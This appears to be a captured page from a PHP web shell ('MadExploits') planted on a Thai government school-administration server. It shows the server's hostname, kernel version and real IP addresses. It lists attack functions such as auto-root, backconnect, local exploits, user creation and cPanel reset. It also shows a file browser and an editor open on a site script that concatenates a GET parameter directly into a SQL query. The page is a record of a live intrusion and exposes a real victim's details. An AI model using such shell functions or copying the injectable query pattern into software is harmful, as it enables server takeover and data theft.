Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
opportunity /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
area_check1.php
8.55
KB
-rw-r--r--
area_pop.php
12.51
KB
-rw-r--r--
area_pop_insert.php
22.78
KB
-rw-r--r--
khet_area.php
6.77
KB
-rw-r--r--
livesearch.php
665
B
-rw-r--r--
moo_list.php
14.93
KB
-rw-r--r--
out_school_report_1.php
21.51
KB
-rw-r--r--
out_school_report_2.php
21.52
KB
-rw-r--r--
out_school_report_3.php
21.51
KB
-rw-r--r--
report1.php
5.44
KB
-rw-r--r--
report2.php
9.34
KB
-rw-r--r--
report3.php
11.05
KB
-rw-r--r--
report4.php
11.57
KB
-rw-r--r--
report5.php
12.43
KB
-rw-r--r--
return_ajax_amphoe.php
603
B
-rw-r--r--
return_ajax_tambon.php
616
B
-rw-r--r--
return_ajax_village.php
662
B
-rw-r--r--
sch_operation.php
4.52
KB
-rw-r--r--
school_area.php
19.99
KB
-rw-r--r--
search.php
19.35
KB
-rw-r--r--
search2.php
19.36
KB
-rw-r--r--
search2_khet.php
18.75
KB
-rw-r--r--
search3.php
19.28
KB
-rw-r--r--
search3_khet.php
18.69
KB
-rw-r--r--
search_insert.php
17.01
KB
-rw-r--r--
search_khet.php
19.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : return_ajax_amphoe.php
<?php header("Content-type: application/xhtml+xml; charset=utf-8"); header("Cache-Control: no-cache, must-revalidate"); require_once("../../../amssplus_connect.php"); require_once("../../../mainfile.php"); $sql = "select * from opportunity_amphoe where prov_code='".$_GET['province']."' order by amp_code"; $query = mysqli_query($connect,$sql); echo "<option value=''>เลือกอำเภอ</option>"; while($result = mysqli_fetch_array($query)){ $amp_code = $result['amp_code']; $amp_name = $result['amp_name']; echo "<option value='$amp_code'>$amp_name</option>"; } ?>
Close